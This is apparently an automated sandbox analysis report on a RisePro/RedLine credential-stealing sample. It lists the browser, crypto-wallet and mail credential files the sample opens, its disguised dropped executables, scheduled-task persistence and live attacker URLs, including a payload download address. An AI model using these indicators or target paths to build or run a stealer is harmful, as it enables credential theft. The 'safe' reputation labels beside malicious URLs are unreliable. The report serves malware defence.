            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,
            Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
            Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
            Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
            Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D6537F GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Yara detected Clipboard Hijacker
            Source: Yara matchFile source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE
            Yara detected RisePro Stealer
            Source: Yara matchFile source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENT
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected RisePro Stealer
            Source: Yara matchFile source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Create Account            		1
            Valid Accounts            		2
            Obfuscated Files or Information            		1
            Credential API Hooking            		2
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Valid Accounts            		1
            Access Token Manipulation            		1
            Software Packing            		Security Account Manager146
            System Information Discovery            		SMB/Windows Admin Shares1
            Screen Capture            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Scheduled Task/Job            		11
            Process Injection            		1
            DLL Side-Loading            		NTDS1
            Query Registry            		Distributed Component Object Model1
            Email Collection            		2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchd21
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		1
            Masquerading            		LSA Secrets221
            Security Software Discovery            		SSH1
            Credential API Hooking            		23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
            Registry Run Keys / Startup Folder            		1
            Valid Accounts            		Cached Domain Credentials11
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1443534 Sample: file.exe Startdate: 17/05/2024 Architecture: WINDOWS Score: 100 54 kuljyftgjk.online 2->54 56 198.187.3.20.in-addr.arpa 2->56 58 2 other IPs or domains 2->58 66 Snort IDS alert for network traffic 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for dropped file 2->70 72 5 other signatures 2->72 9 file.exe 1 101 2->9         started        14 MSIUpdaterV2.exe 2->14         started        16 oobeldr.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 60 5.42.96.170, 49707, 80 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 9->60 62 5.42.96.65, 49704, 49714, 50500 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 9->62 64 2 other IPs or domains 9->64 46 C:\Users\user\...\llmcrdwzLnNKYB4T0Vnw.exe, MS-DOS 9->46 dropped 48 C:\Users\user\AppData\Local\...dgeMS2.exe, MS-DOS 9->48 dropped 50 C:\Users\user\AppData\Local\...\l2[1].exe, MS-DOS 9->50 dropped 52 3 other malicious files 9->52 dropped 80 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->80 82 Tries to steal Mail credentials (via file / registry access) 9->82 84 Uses schtasks.exe or at.exe to add and modify task schedules 9->84 92 2 other signatures 9->92 20 llmcrdwzLnNKYB4T0Vnw.exe 1 9->20         started        24 schtasks.exe 1 9->24         started        26 schtasks.exe 1 9->26         started        86 Antivirus detection for dropped file 14->86 88 Multi AV Scanner detection for dropped file 14->88 90 Detected unpacking (changes PE section rights) 14->90 28 schtasks.exe 1 14->28         started        30 schtasks.exe 1 16->30         started        file6 signatures7 process8 file9 44 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 20->44 dropped 74 Antivirus detection for dropped file 20->74 76 Multi AV Scanner detection for dropped file 20->76 78 Detected unpacking (changes PE section rights) 20->78 32 schtasks.exe 1 20->32         started        34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        40 conhost.exe 30->40         started        signatures10 process11 process12 42 conhost.exe 32->42         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe100%AviraHEUR/AGEN.1304053
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe100%AviraHEUR/AGEN.1304053
            C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe100%AviraHEUR/AGEN.1304053
            C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe100%AviraHEUR/AGEN.1304053
            C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe100%AviraHEUR/AGEN.1304053
            C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe100%AviraHEUR/AGEN.1304053
            C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe83%ReversingLabsWin32.Trojan.RedLine
            C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe83%ReversingLabsWin32.Trojan.RedLine
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe83%ReversingLabsWin32.Trojan.RedLine
            C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe83%ReversingLabsWin32.Trojan.RedLine
            C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe83%ReversingLabsWin32.Trojan.RedLine
            C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe83%ReversingLabsWin32.Trojan.RedLine

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://sectigo.com/CPS00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ipinfo.io/Mozilla/5.00%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            https://ipinfo.io/0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://ipinfo.io/t0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            https://support.mozilla.org0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/server/k/l2.exemespace0%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/server/k/l2.exe0%Avira URL Cloudsafe
            https://db-ip.com:443/demo/home.php?s=12.205.151.600%Avira URL Cloudsafe
            https://ipinfo.io/widget/demo/12.205.151.600%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://db-ip.com/z-0%Avira URL Cloudsafe
            http://5.42.96.170/server/k/l2.exe0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
            https://t.me/risepro_bot0%Avira URL Cloudsafe
            http://5.42.96.170/server/k/l2.exe50%Avira URL Cloudsafe
            https://kuljyftgjk.online/server/k/l2.exe5P#.0%Avira URL Cloudsafe
            https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe0%Avira URL Cloudsafe
            https://db-ip.com/demo/home.php?s=12.205.151.600%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/I0%Avira URL Cloudsafe
            http://5.42.96.170/server/k/l2.exeDTl0%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/server/k/l2.exe5G0%Avira URL Cloudsafe
            https://kuljyftgjk.online/server/k/l2.exeo0%Avira URL Cloudsafe
            https://kuljyftgjk.online/server/k/l2.exexefN0%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/Mi&/0%Avira URL Cloudsafe
            https://ipinfo.io:443/widget/demo/12.205.151.600%Avira URL Cloudsafe
            https://t.me/risepro_botisepro_bot0%Avira URL Cloudsafe
            https://kuljyftgjk.online/server/k/l2.exe0%Avira URL Cloudsafe
            https://kuljyftgjk.online/0%Avira URL Cloudsafe
            https://kuljyftgjk.online:80/server/k/l2.exeJG0%Avira URL Cloudsafe
            https://kuljyftgjk.online/Bb0%Avira URL Cloudsafe
            https://t.me/risepro_bot%(0%Avira URL Cloudsafe
            https://kuljyftgjk.online/ons0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ipinfo.io
            		34.117.186.192
            		truefalse
              		unknown
              db-ip.com
              		172.67.75.166
              		truefalse
                		unknown
                kuljyftgjk.online
                		unknown
                		unknowntrue
                  		unknown
                  198.187.3.20.in-addr.arpa
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://5.42.96.170/server/k/l2.exetrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://ipinfo.io/widget/demo/12.205.151.60false
                    • Avira URL Cloud: safe
                    		unknown
                    https://db-ip.com/demo/home.php?s=12.205.151.60false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://kuljyftgjk.online:80/server/k/l2.exefile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kuljyftgjk.online:80/server/k/l2.exemespacefile.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://sectigo.com/CPS0file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://db-ip.com/z-file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.sectigo.com0file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://db-ip.com:443/demo/home.php?s=12.205.151.60file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllfile.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpfalse
                    • URL Reputation: safe
                    		unknown
